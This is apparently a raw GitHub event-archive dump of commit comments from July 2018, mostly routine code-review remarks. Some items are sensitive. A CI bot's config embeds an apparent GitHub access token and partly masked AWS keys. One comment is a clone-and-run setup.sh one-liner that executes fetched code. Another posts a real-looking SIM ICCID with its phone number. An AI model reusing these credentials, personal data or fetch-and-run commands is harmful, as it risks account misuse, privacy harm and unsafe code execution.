{"id":"7968950974","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29716186,"position":null,"line":null,"path":null,"commit_id":"f22d107b4329e9420fab10c9c95c808a312cbc9e","created_at":"2018-07-16T07:03:12Z","updated_at":"2018-07-16T07:03:12Z","author_association":"NONE","body":"### Task failed during event f5aec65f-cb52-44ba-8572-667025d7d8b1\n'DockerServerless: Deploy to Lambda', any subtasks have been skipped. Config: \n```json\n{\n  \"executor\": \"DockerServerless\",\n  \"context\": \"Deploy to Lambda\",\n  \"options\": {\n    \"image\": \"zotoio/gtm-worker:1.7.3\",\n    \"command\": \"/usr/workspace/serverless-mono-deploy.sh\",\n    \"env\": {\n      \"GIT_CLONE\": \"https://github.com/zotoio/serverless-central.git\",\n      \"GIT_PR_ID\": \"\",\n      \"GIT_PR_BRANCHNAME\": \"\",\n      \"GIT_PUSH_BRANCHNAME\": \"refs/heads/master\",\n      \"GIT_URL\": \"https://github.com/zotoio/serverless-central/compare/7da93d5897e7...f22d107b4329\",\n      \"GIT_COMMIT\": \"f22d107b4329e9420fab10c9c95c808a312cbc9e\",\n      \"GTM_EVENT_ID\": \"f5aec65f-cb52-44ba-8572-667025d7d8b1\",\n      \"SLS_AFFECTED_PACKAGES\": \"sample-http\",\n      \"S3_DEPENDENCY_BUCKET\": \"gtmstorage4\",\n      \"AWS_S3_PROXY\": \"\",\n      \"SLS_AWS_STAGE\": \"dev\",\n      \"SLS_AWS_REGION\": \"ap-southeast-2\",\n      \"SLS_AWS_EXECUTION_ROLE\": \"arn:aws:iam::347186442473:role/lambda-execution\",\n      \"SLS_DEPLOY_MODE\": \"parallel\",\n      \"SLS_APIGW_ENDPOINT_TYPE\": \"EDGE\",\n      \"SLS_APIGW_DOMAIN_SUFFIX\": \"\",\n      \"SLS_DEPLOYMENT_S3_BUCKET_PREFIX\": \"io.zoto\",\n      \"SLS_SNS_ERROR_TOPIC_ARN\": \"arn:aws:sns:ap-southeast-2:347186442473:serverless-errors\",\n      \"SLS_HTTP_PROXY\": \"\",\n      \"SLS_NO_PROXY\": \"\",\n      \"SLS_VPC_ID\": \"\",\n      \"SLS_VPC_SECURITY_GROUP_ID\": \"\",\n      \"SLS_VPC_SUBNET_A\": \"\",\n      \"SLS_VPC_SUBNET_B\": \"\",\n      \"SLS_VPC_SUBNET_C\": \"\",\n      \"SLS_AWS_KMS_KEY_ID\": \"\",\n      \"SLS_CONFIG_TYPE\": \"ssm\",\n      \"GTM_WORKER_SCRIPTS_CLONE\": \"https://d9f2a51e3b99c8d6becc30141ee2570d73d99d49@github.com/zotoio/gtm-worker-scripts.git\",\n      \"GTM_WORKER_SCRIPTS_PATH\": \"scripts\",\n      \"GTM_AWS_ACCESS_KEY_ID\": \"************ZPB2Q\",\n      \"GTM_AWS_SECRET_ACCESS_KEY\": \"************YKWlR\",\n      \"GTM_AWS_REGION\": \"ap-southeast-2\",\n      \"SLS_VERBOSE_OFF\": \"true\",\n      \"SLS_SPRING_CONFIG_ENDPOINT_OFF\": \"http://spring:8888\"\n    },\n    \"validator\": {\n      \"type\": \"outputRegex\",\n      \"regex\": \".*ALL DEPLOYS SUCCESSFUL.*\"\n    }\n  },\n  \"hash\": \"eea752\",\n  \"results\": {\n    \"passed\": false,\n    \"url\": \"https://github.com/apocas/dockerode\",\n    \"message\": \"docker execution error\",\n    \"details\": \"(HTTP code 500) server error - Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers) \"\n  }\n}\n```"}},"created_at":"2018-07-16T07:03:12Z"}
{"id":"7968950986","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29716187,"position":null,"line":null,"path":null,"commit_id":"f22d107b4329e9420fab10c9c95c808a312cbc9e","created_at":"2018-07-16T07:03:12Z","updated_at":"2018-07-16T07:03:12Z","author_association":"NONE","body":"### Results for event id: f5aec65f-cb52-44ba-8572-667025d7d8b1\n<details><summary>DockerServerless : Deploy to Lambda (eea752) docker execution error</summary>\n<p>(HTTP code 500) server error - Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers) \nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-16T07:03:12Z"}
{"id":"7968960819","type":"CommitCommentEvent","actor":{"login":"conquerora"},"repo":{"name":"conquerora/-1"},"payload":{"comment":{"id":29716215,"position":null,"line":null,"path":null,"commit_id":"39b5bb756bf780790cb21fd81428c96def30079a","created_at":"2018-07-16T07:06:18Z","updated_at":"2018-07-16T07:06:18Z","author_association":"OWNER","body":"git clone https://github.com/GitHubNull/YaHei-Consolas-Hybrid-1.12.git && sh YaHei-Consolas-Hybrid-1.12/setup.sh && cd - && rm -rf YaHei-Consolas-Hybrid-1.12"}},"created_at":"2018-07-16T07:06:18Z"}
{"id":"7968961931","type":"CommitCommentEvent","actor":{"login":"Juslonluo"},"repo":{"name":"bigsinger/AndroidIdChanger"},"payload":{"comment":{"id":29716217,"position":null,"line":null,"path":null,"commit_id":"aa993d8ba58863e1d922efcd609943a462626bf2","created_at":"2018-07-16T07:06:39Z","updated_at":"2018-07-16T07:06:39Z","author_association":"NONE","body":"作者您好，我发现中国目前的iccid，是由于19位数字+1个大写字母组成。\r\n例如：中国电信：8986 0318 8475 5032 638X Q   这是一个真实的iccid，对应电话号码为 153 2346 7178。"}},"created_at":"2018-07-16T07:06:39Z"}
{"id":"7968966865","type":"CommitCommentEvent","actor":{"login":"akurets"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29716229,"position":9,"line":9,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-16T07:08:08Z","updated_at":"2018-07-16T07:08:08Z","author_association":"OWNER","body":"ок"}},"created_at":"2018-07-16T07:08:08Z"}
{"id":"7968967161","type":"CommitCommentEvent","actor":{"login":"gneginskiy"},"repo":{"name":"nmice/Task"},"payload":{"comment":{"id":29716231,"position":30,"line":27,"path":"src/main/java/week06/TaskG02_04_ArrayList/ArrayListOwn.java","commit_id":"6b96399674fc345578e4f779678a6c7f3b5c5c3b","created_at":"2018-07-16T07:08:12Z","updated_at":"2018-07-16T07:08:12Z","author_association":"COLLABORATOR","body":"violates encapsulation principle.\r\nplease, remove this!"}},"created_at":"2018-07-16T07:08:12Z"}
{"id":"7968967649","type":"CommitCommentEvent","actor":{"login":"akurets"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29716233,"position":11,"line":11,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-16T07:08:20Z","updated_at":"2018-07-16T07:08:20Z","author_association":"OWNER","body":"ок"}},"created_at":"2018-07-16T07:08:20Z"}
{"id":"7968968303","type":"CommitCommentEvent","actor":{"login":"akurets"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29716236,"position":24,"line":24,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-16T07:08:32Z","updated_at":"2018-07-16T07:08:32Z","author_association":"OWNER","body":"ок"}},"created_at":"2018-07-16T07:08:32Z"}
{"id":"7968970723","type":"CommitCommentEvent","actor":{"login":"Practices001"},"repo":{"name":"Practices001/SuitePractice001"},"payload":{"comment":{"id":29716238,"position":null,"line":null,"path":null,"commit_id":"d025291fe35f0e25f7cb8cc202445f73b777173b","created_at":"2018-07-16T07:09:13Z","updated_at":"2018-07-16T07:09:13Z","author_association":"OWNER","body":"Just adding a redundant comment"}},"created_at":"2018-07-16T07:09:13Z"}
{"id":"7968973150","type":"CommitCommentEvent","actor":{"login":"brusch"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29716243,"position":null,"line":null,"path":null,"commit_id":"aad58db885a70b9615b1362f0bbfd89590e52adb","created_at":"2018-07-16T07:09:56Z","updated_at":"2018-07-16T07:09:56Z","author_association":"MEMBER","body":"Thanks! :)"}},"created_at":"2018-07-16T07:09:56Z"}
{"id":"7968975259","type":"CommitCommentEvent","actor":{"login":"songqsh"},"repo":{"name":"songqsh/Computational-methods-in-finance"},"payload":{"comment":{"id":29716247,"position":null,"line":null,"path":null,"commit_id":"303191f324c762bd42b6a8208387e113710d84c2","created_at":"2018-07-16T07:10:30Z","updated_at":"2018-07-16T07:10:30Z","author_association":"OWNER","body":"Black and Scholes formula"}},"created_at":"2018-07-16T07:10:30Z"}
{"id":"7968977008","type":"CommitCommentEvent","actor":{"login":"thelostone-mc"},"repo":{"name":"gitcoinco/web"},"payload":{"comment":{"id":29716254,"position":null,"line":null,"path":null,"commit_id":"715695ac3c9e1e2ee6691b45cb22850e3ac61941","created_at":"2018-07-16T07:11:05Z","updated_at":"2018-07-16T07:11:05Z","author_association":"MEMBER","body":"Ah this messes up the waiting state loader page :| \r\n\r\nFix : https://github.com/gitcoinco/web/pull/1752"}},"created_at":"2018-07-16T07:11:05Z"}
{"id":"7968982524","type":"CommitCommentEvent","actor":{"login":"akurets"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29716272,"position":41,"line":41,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-16T07:12:51Z","updated_at":"2018-07-16T07:12:51Z","author_association":"OWNER","body":"``\r\n        public static boolean isDateValid(int year, int month, int day) {\r\n        boolean valid = true;\r\n        boolean temporal = isTemporal(year);\r\n        if (year < 0) {\r\n            valid = false;\r\n        } else if (month > 12 || month < 1) {\r\n            valid = false;\r\n        } else if (month == 2) {\r\n            if (temporal && day > 29) {\r\n                valid = false;\r\n            } else if (!temporal && day > 28) {\r\n                valid = false;\r\n            }"}},"created_at":"2018-07-16T07:12:51Z"}
{"id":"7968986518","type":"CommitCommentEvent","actor":{"login":"tkryskiewicz"},"repo":{"name":"jerairrest/react-chartjs-2"},"payload":{"comment":{"id":29716279,"position":7,"line":29,"path":"index.d.ts","commit_id":"c4adc012d7b270f6903ffffa00591c5ee1c6cfaf","created_at":"2018-07-16T07:14:02Z","updated_at":"2018-07-16T07:14:02Z","author_association":"NONE","body":"Hi,\r\n`datasetKeyProvider` should probably be optional, because it gets a default value from `defaultProps` -\r\nhttps://github.com/jerairrest/react-chartjs-2/blob/459504b79ba1917745c98861ba646185a22975b6/src/index.js#L39"}},"created_at":"2018-07-16T07:14:02Z"}
{"id":"7968989758","type":"CommitCommentEvent","actor":{"login":"akurets"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29716288,"position":41,"line":41,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-16T07:14:58Z","updated_at":"2018-07-16T07:14:58Z","author_association":"OWNER","body":"ты имеешь ввиду создать переменную, например boolean temporal = isTemporal(year);\r\nи тогда переписать:\r\n       \r\n            if (temporal && day > 29) {\r\n                valid = false;\r\n            } else if (!temporal && day > 28) {\r\n                valid = false;\r\n            }\r\n\r\nнад if-else ещё подумаю как переписать."}},"created_at":"2018-07-16T07:14:58Z"}
{"id":"7968990312","type":"CommitCommentEvent","actor":{"login":"RReverser"},"repo":{"name":"tdewolff/minify"},"payload":{"comment":{"id":29716291,"position":null,"line":null,"path":null,"commit_id":"835afedd1a7d95549ad735ed1c5ba3d357e21674","created_at":"2018-07-16T07:15:09Z","updated_at":"2018-07-16T07:15:09Z","author_association":"CONTRIBUTOR","body":"Yeah I would basically go for what you said first (that is, option 3 as it is now, but still with whitespace removal after tokenising the contents). "}},"created_at":"2018-07-16T07:15:09Z"}
{"id":"7968994976","type":"CommitCommentEvent","actor":{"login":"randombyte-developer"},"repo":{"name":"randombyte-developer/entity-particles"},"payload":{"comment":{"id":29716295,"position":25,"line":34,"path":"build.gradle","commit_id":"df30977eee89fe32fdb8abb279a54bf9fdf8c6c1","created_at":"2018-07-16T07:16:27Z","updated_at":"2018-07-16T07:16:27Z","author_association":"OWNER","body":"This dates back to when the plugin wasn't public, changed in #3 "}},"created_at":"2018-07-16T07:16:27Z"}
{"id":"7968996451","type":"CommitCommentEvent","actor":{"login":"akurets"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29716300,"position":54,"line":54,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-16T07:16:53Z","updated_at":"2018-07-16T07:16:53Z","author_association":"OWNER","body":"ок"}},"created_at":"2018-07-16T07:16:53Z"}
{"id":"7968998684","type":"CommitCommentEvent","actor":{"login":"makkev2"},"repo":{"name":"udacity/reactnd-udacimeals-complete"},"payload":{"comment":{"id":29716306,"position":15,"line":15,"path":"src/components/App.js","commit_id":"e01aeaf5719ab83cb4af8bf6aa944148335122f9","created_at":"2018-07-16T07:17:32Z","updated_at":"2018-07-16T07:17:32Z","author_association":"NONE","body":"Thanks, this is clearer and simpler to me."}},"created_at":"2018-07-16T07:17:32Z"}
{"id":"7968999386","type":"CommitCommentEvent","actor":{"login":"Jan-E"},"repo":{"name":"hydra3333/ffmpeg-windows-build-helpers-withOpenCL"},"payload":{"comment":{"id":29716308,"position":null,"line":null,"path":null,"commit_id":"4f863317dd8de70723881da5dbfd7e7da8e4bd44","created_at":"2018-07-16T07:17:45Z","updated_at":"2018-07-16T07:17:45Z","author_association":"NONE","body":"@hydra3333 I can hardly believe such a speed difference. Before I start switching from a (old) clone of @rdp 's script to a Python based script: is a ffmpeg.exe with the high speed somewhere available for download?"}},"created_at":"2018-07-16T07:17:45Z"}
{"id":"7969000267","type":"CommitCommentEvent","actor":{"login":"deepchandra"},"repo":{"name":"deepchandra/CRUD"},"payload":{"comment":{"id":29716309,"position":null,"line":null,"path":null,"commit_id":"323c44b82a61859e46a39a17194695efc1e354cd","created_at":"2018-07-16T07:18:01Z","updated_at":"2018-07-16T07:18:01Z","author_association":"OWNER","body":"Initial commit"}},"created_at":"2018-07-16T07:18:01Z"}
{"id":"7969004384","type":"CommitCommentEvent","actor":{"login":"jmvedrine"},"repo":{"name":"moodle/moodle"},"payload":{"comment":{"id":29716322,"position":null,"line":null,"path":null,"commit_id":"8df402e4019724a6aeb555df6e6ae082b1af71ff","created_at":"2018-07-16T07:19:11Z","updated_at":"2018-07-16T07:19:11Z","author_association":"CONTRIBUTOR","body":"Hello Shamin,\r\nOf course this is not the rrot problem of this issue but there is a typo that should be corrected\r\n$errors[] = get_string('restoremultipletopcats', 'questions', $contextid);\r\nshould be\r\n$errors[] = get_string('restoremultipletopcats', 'question', $contextid);"}},"created_at":"2018-07-16T07:19:11Z"}
{"id":"7969005272","type":"CommitCommentEvent","actor":{"login":"meleg"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29716324,"position":5,"line":84,"path":"src/method_iar_chebyshev.jl","commit_id":"d7e1566ebe64c782e77fce05f3c1f653cc858873","created_at":"2018-07-16T07:19:28Z","updated_at":"2018-07-16T07:19:28Z","author_association":"CONTRIBUTOR","body":"Right! I fixed this too quickly last time. I will fix it again."}},"created_at":"2018-07-16T07:19:28Z"}
{"id":"7969006973","type":"CommitCommentEvent","actor":{"login":"rchani99"},"repo":{"name":"rchani99/movieql"},"payload":{"comment":{"id":29716326,"position":null,"line":null,"path":null,"commit_id":"2202a2114ad1ae23a88dedcb18796e3ede0156b6","created_at":"2018-07-16T07:19:58Z","updated_at":"2018-07-16T07:19:58Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-16T07:19:58Z"}
{"id":"7969008990","type":"CommitCommentEvent","actor":{"login":"ydq870102"},"repo":{"name":"ydq870102/hdopsm"},"payload":{"comment":{"id":29716330,"position":null,"line":null,"path":null,"commit_id":"b3dcf14825813f65c1400aeb01e1bd481f714455","created_at":"2018-07-16T07:20:34Z","updated_at":"2018-07-16T07:20:34Z","author_association":"OWNER","body":"ydq"}},"created_at":"2018-07-16T07:20:34Z"}
{"id":"7969009092","type":"CommitCommentEvent","actor":{"login":"Munna-k"},"repo":{"name":"Munna-k/second"},"payload":{"comment":{"id":29716331,"position":null,"line":null,"path":null,"commit_id":"4f7a7c02e75ac5f7deb470841a86df4ac745775a","created_at":"2018-07-16T07:20:36Z","updated_at":"2018-07-16T07:20:36Z","author_association":"OWNER","body":"xcxcxcx"}},"created_at":"2018-07-16T07:20:36Z"}
{"id":"7969013346","type":"CommitCommentEvent","actor":{"login":"tdiesler"},"repo":{"name":"AegeusCoin/AegeusInstaller"},"payload":{"comment":{"id":29716344,"position":13,"line":13,"path":"aegeus_installer","commit_id":"cfc43a10f34e02d35f05e8aae0570bfa2d4d98ce","created_at":"2018-07-16T07:21:48Z","updated_at":"2018-07-16T07:21:48Z","author_association":"NONE","body":"This should reference a tagged version of the bootstrap data. When this script gets tagged, it will no longer create a reproducible result because it always uses the \"latest\" bootstrap."}},"created_at":"2018-07-16T07:21:48Z"}
{"id":"7969013839","type":"CommitCommentEvent","actor":{"login":"akurets"},"repo":{"name":"akurets/jd1"},"payload":{"comment":{"id":29716347,"position":80,"line":80,"path":"src/homeWork/hw2/TaskOne.java","commit_id":"8ae161d3318481a259f18439c68c16af468eb2c8","created_at":"2018-07-16T07:21:56Z","updated_at":"2018-07-16T07:21:56Z","author_association":"OWNER","body":"case 28:\r\n    if (isTemporal(year) && month == 2) {\r\n        day = 1;\r\n        month++;\r\n    } esle if (month == 2) {\r\n         day++;\r\n         }\r\n         break;\r\n\r\nтипа того?"}},"created_at":"2018-07-16T07:21:56Z"}
{"id":"7969014134","type":"CommitCommentEvent","actor":{"login":"xgrommx"},"repo":{"name":"ekmett/recursion-schemes"},"payload":{"comment":{"id":29716349,"position":17,"line":540,"path":"Data/Functor/Foldable.hs","commit_id":"78eabde55e876deb18d3a69465f568982c2459f2","created_at":"2018-07-16T07:22:01Z","updated_at":"2018-07-16T07:22:01Z","author_association":"NONE","body":"@gelisam Interesting but why not generalize it?\r\n\r\n```haskell\r\ngHoist :: (Recursive t, Corecursive a) => (Base t a -> Base a a) -> t -> a\r\ngHoist n = cata (embed . n)\r\n\r\nhoistFix :: (Functor f, Functor g) => (forall a. f a -> g a) -> Fix f -> Fix g\r\nhoistFix = gHoist\r\n\r\nhoistMu :: (Functor f, Functor g) => (forall a. f a -> g a) -> Mu f -> Mu g\r\nhoistMu = gHoist\r\n\r\nhoistNu :: (Functor f, Functor g) => (forall a. f a -> g a) -> Nu f -> Nu g\r\nhoistNu = gHoist\r\n```"}},"created_at":"2018-07-16T07:22:01Z"}
{"id":"7969038438","type":"CommitCommentEvent","actor":{"login":"melaniam"},"repo":{"name":"MagicMakers/MagicVolunteers"},"payload":{"comment":{"id":29716419,"position":4,"line":13,"path":"magic-volunteers-front-end/package.json","commit_id":"f40514a6c2cc66b4a4f600fd9a5e5a0f4e082417","created_at":"2018-07-16T07:29:01Z","updated_at":"2018-07-16T07:29:01Z","author_association":"COLLABORATOR","body":"We don't need react-geocode anymore. I moved the functionality in a util file. See https://github.com/MagicMakers/MagicVolunteers/pull/13"}},"created_at":"2018-07-16T07:29:01Z"}
{"id":"7969040924","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"loki-project/loki"},"payload":{"comment":{"id":29716422,"position":6,"line":202,"path":"src/cryptonote_basic/difficulty.cpp","commit_id":"45c95643b9bc2723f3f77495b4978ef3248d5ad1","created_at":"2018-07-16T07:29:44Z","updated_at":"2018-07-16T07:29:44Z","author_association":"COLLABORATOR","body":"No."}},"created_at":"2018-07-16T07:29:44Z"}
{"id":"7969043832","type":"CommitCommentEvent","actor":{"login":"rootsongjc"},"repo":{"name":"rootsongjc/kubernetes-handbook"},"payload":{"comment":{"id":29716427,"position":1,"line":1,"path":"manifests/prometheus/prometheus-datasource.json","commit_id":"198ce94364b3115e43799fd6795b2563c81f66bd","created_at":"2018-07-16T07:30:31Z","updated_at":"2018-07-16T07:30:31Z","author_association":"OWNER","body":"这个配置有问题，需要完善"}},"created_at":"2018-07-16T07:30:31Z"}
{"id":"7969043883","type":"CommitCommentEvent","actor":{"login":"frontbear"},"repo":{"name":"Tencent/weui"},"payload":{"comment":{"id":29716428,"position":null,"line":null,"path":null,"commit_id":"b48228453f7856bb660e403a003b12795ca669b7","created_at":"2018-07-16T07:30:32Z","updated_at":"2018-07-16T07:30:32Z","author_association":"NONE","body":"请问 weui v1.1.3 的变更需要同步到 weui-wxss https://github.com/Tencent/weui-wxss 这里吗？"}},"created_at":"2018-07-16T07:30:32Z"}
{"id":"7969045362","type":"CommitCommentEvent","actor":{"login":"jcktm"},"repo":{"name":"loki-project/loki"},"payload":{"comment":{"id":29716429,"position":6,"line":202,"path":"src/cryptonote_basic/difficulty.cpp","commit_id":"45c95643b9bc2723f3f77495b4978ef3248d5ad1","created_at":"2018-07-16T07:30:57Z","updated_at":"2018-07-16T07:30:57Z","author_association":"COLLABORATOR","body":"![](https://media.giphy.com/media/3o7btT1T9qpQZWhNlK/giphy.gif)"}},"created_at":"2018-07-16T07:30:57Z"}
{"id":"7969047574","type":"CommitCommentEvent","actor":{"login":"okrasner"},"repo":{"name":"spacewalkproject/spacewalk"},"payload":{"comment":{"id":29716432,"position":null,"line":null,"path":null,"commit_id":"ca2c784eaff062b36f5f464affc50c2a2d21fa6a","created_at":"2018-07-16T07:31:33Z","updated_at":"2018-07-16T07:31:33Z","author_association":"NONE","body":"Please extend it again."}},"created_at":"2018-07-16T07:31:33Z"}
{"id":"7969048185","type":"CommitCommentEvent","actor":{"login":"davidyuk"},"repo":{"name":"aeternity/noise-c.wasm"},"payload":{"comment":{"id":29716434,"position":null,"line":null,"path":null,"commit_id":"9e823af5b08a6a1fe2c9e47e46c4b6bb0e0570ab","created_at":"2018-07-16T07:31:42Z","updated_at":"2018-07-16T07:31:42Z","author_association":"MEMBER","body":"@nazar-pc yes, this change breaks API.\r\nI'm using `options` to override `noise-c.wasm` path using [`locateFile` callback](https://kripken.github.io/emscripten-site/docs/api_reference/module.html#affecting-execution). By default this package tries to fetch `noise-c.wasm` from the root of our SPA, but we are using Webpack to handle assets so `noise-c.wasm` have a different path."}},"created_at":"2018-07-16T07:31:42Z"}
{"id":"7969059141","type":"CommitCommentEvent","actor":{"login":"koevskinikola"},"repo":{"name":"camunda/camunda-bpm-webapp"},"payload":{"comment":{"id":29716448,"position":87,"line":87,"path":"src/main/java/org/camunda/bpm/webapp/impl/security/filter/CsrfPreventionFilter.java","commit_id":"d2ca518dbe53eed373a8da45f0f65cc6626bb0bd","created_at":"2018-07-16T07:34:45Z","updated_at":"2018-07-16T07:34:45Z","author_association":"CONTRIBUTOR","body":"Very!!! :smiley: "}},"created_at":"2018-07-16T07:34:45Z"}
{"id":"7969059677","type":"CommitCommentEvent","actor":{"login":"mattijsjanssens"},"repo":{"name":"mattijsjanssens/mattijs-extensions"},"payload":{"comment":{"id":29716450,"position":119,"line":519,"path":"applications/test/amgcl/amgclSolver/amgclSolver.C","commit_id":"742c500c1c588af61613366b3667fbac17fdc7db","created_at":"2018-07-16T07:34:53Z","updated_at":"2018-07-16T07:34:53Z","author_association":"OWNER","body":"I noticed something had changed when I updated amgcl. I'll have a closer\nlook and might have some questions. Many thanks for post.\n\n\nOn Fri, 13 Jul 2018, 16:35 Denis Demidov, <notifications@github.com> wrote:\n\n> I've recently added a \"Full-AMG\" parallel version, which works much better\n> than subdomain deflation, see [1] for an example, [2] and [3] for\n> comparison of strong and weak scalability with Trilinos ML. [4] has\n> comparison of the subdomain deflation with Trilinos ML.\n>\n> [1] https://github.com/ddemidov/amgcl/blob/master/examples/mpi/mpi_amg.cpp\n> [2]\n> http://nbviewer.jupyter.org/gist/ddemidov/be3175832f5aefae34dfbdc4748129f0\n> [3]\n> http://nbviewer.jupyter.org/gist/ddemidov/635eab912208bef5bada382608dab4e8\n> [4] https://arxiv.org/abs/1710.03940\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mattijsjanssens/mattijs-extensions/commit/742c500c1c588af61613366b3667fbac17fdc7db#commitcomment-29701657>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AL-eP9l3m8pIpnkB7T-ZI6bGYnnK-m9dks5uGL5LgaJpZM4VPF5t>\n> .\n>\n"}},"created_at":"2018-07-16T07:34:53Z"}
{"id":"7969059852","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"Grsmto/simplebar"},"payload":{"comment":{"id":29716451,"position":null,"line":null,"path":null,"commit_id":"15bbbb6b4b461d39d995bbc44decd3ea7ab1708d","created_at":"2018-07-16T07:34:56Z","updated_at":"2018-07-16T07:34:56Z","author_association":"NONE","body":"it seems the \"dist\" folder is missing from the git tags on github?"}},"created_at":"2018-07-16T07:34:56Z"}
{"id":"7969060660","type":"CommitCommentEvent","actor":{"login":"agushermansyah621"},"repo":{"name":"Nadyatjia/Chuckyfix"},"payload":{"comment":{"id":29716453,"position":null,"line":null,"path":null,"commit_id":"39cc8e13e9309badff37be67f86dbeb293ff818e","created_at":"2018-07-16T07:35:10Z","updated_at":"2018-07-16T07:35:10Z","author_association":"NONE","body":"Putra.py"}},"created_at":"2018-07-16T07:35:10Z"}
{"id":"7969062413","type":"CommitCommentEvent","actor":{"login":"OtaK"},"repo":{"name":"actix/actix-web"},"payload":{"comment":{"id":29716458,"position":null,"line":null,"path":null,"commit_id":"3373847a14e69969e02bc7347f4f5f808432a040","created_at":"2018-07-16T07:35:38Z","updated_at":"2018-07-16T07:35:38Z","author_association":"CONTRIBUTOR","body":"Shouldn't it be better to set a capacity of `self.limit` whatever the value of it is? Would avoid writing hardcoded values like this."}},"created_at":"2018-07-16T07:35:38Z"}
{"id":"7969062917","type":"CommitCommentEvent","actor":{"login":"scott88lee"},"repo":{"name":"sadakosa/FoodGecko"},"payload":{"comment":{"id":29716459,"position":null,"line":null,"path":null,"commit_id":"07079bffa1bf8c311fbb0129a8c99e513c5089cd","created_at":"2018-07-16T07:35:47Z","updated_at":"2018-07-16T07:35:47Z","author_association":"COLLABORATOR","body":"registerPost route.\r\n\r\nHooked up to RDS.\r\nNeed to make db pswd private.\r\n"}},"created_at":"2018-07-16T07:35:47Z"}
{"id":"7969062970","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"openatv/MetrixHD"},"payload":{"comment":{"id":29716460,"position":null,"line":null,"path":null,"commit_id":"01792281b3cdf3dd615b072d216cafe8a12f5626","created_at":"2018-07-16T07:35:48Z","updated_at":"2018-07-16T07:35:48Z","author_association":"MEMBER","body":"```\r\n08:46:18.6104 { D } Traceback (most recent call last):\r\n08:46:18.6104 { D }   File \"/usr/lib/enigma2/python/Navigation.py\", **** 237, in dispatchEvent\r\n08:46:18.6106 { D }   File \"/usr/lib/enigma2/python/Components/PerServiceDisplay.py\", **** 17, in event\r\n08:46:18.6109 { D }   File \"/usr/lib/enigma2/python/Components/Sources/CurrentService.py\", **** 26, in serviceEvent\r\n08:46:18.6111 { D }   File \"/usr/lib/enigma2/python/Components/Element.py\", **** 86, in changed\r\n08:46:18.6112 { D }   File \"/usr/lib/enigma2/python/Tools/CList.py\", **** 7, in __call__\r\n08:46:18.6113 { D }   File \"/usr/lib/enigma2/python/Components/Converter/ServiceName.py\", **** 128, in changed\r\n08:46:18.6114 { D }   File \"/usr/lib/enigma2/python/Components/Element.py\", **** 86, in changed\r\n08:46:18.6115 { D }   File \"/usr/lib/enigma2/python/Tools/CList.py\", **** 7, in __call__\r\n08:46:18.6116 { D }   File \"/home/oe1/atv62/build-enviroment/builds/openatv/release/gb7252/tmp/work/cortexa15hf-neon-vfpv4-oe-linux-gnueabi/enigma2-plugin-skins-metrix-atv/2.1+gitAUTOINC+3622c4bd70-r7/git/usr/lib/enigma2/python/Components/Renderer/MetrixHDXPicon.py\", **** 80, in changed\r\n08:46:18.6118 { D }   File \"/usr/lib/enigma2/python/Components/config.py\", **** 1846, in __getattr__\r\n08:46:18.6121 { D } KeyError: 'MyMetrixLiteOther'\r\n08:46:18.6121 [ E ] python/python.cpp:209 call [ePyObject] (PyObject_CallObject(<bound method Navigation.dispatchEvent of <Navigation.Navigation instance at 0xb1793530>>,(0,)) failed)\r\n```\r\n\r\nSorry, seems to cause problems - had to revert, not able to fix myself right now"}},"created_at":"2018-07-16T07:35:48Z"}
{"id":"7969064256","type":"CommitCommentEvent","actor":{"login":"konimex"},"repo":{"name":"artix-linux/packages-galaxy"},"payload":{"comment":{"id":29716463,"position":null,"line":null,"path":null,"commit_id":"c3c0f517cc1ad60445e562a1d9b5e217f6f1c0f5","created_at":"2018-07-16T07:36:08Z","updated_at":"2018-07-16T07:36:08Z","author_association":"MEMBER","body":"I don't think the setcap must be removed since it's needed by user/initscript/services to run dnscrypt as a regular user."}},"created_at":"2018-07-16T07:36:08Z"}
{"id":"7969066601","type":"CommitCommentEvent","actor":{"login":"FirstYy"},"repo":{"name":"FirstYy/jenkins"},"payload":{"comment":{"id":29716466,"position":4,"line":26,"path":"src/main/java/com/itmayiedu/contoller/HelloConttoller.java","commit_id":"51cf416d771bb5e487992f4d41c00f7580dbabda","created_at":"2018-07-16T07:36:47Z","updated_at":"2018-07-16T07:36:47Z","author_association":"OWNER","body":"？？？\r\n"}},"created_at":"2018-07-16T07:36:47Z"}
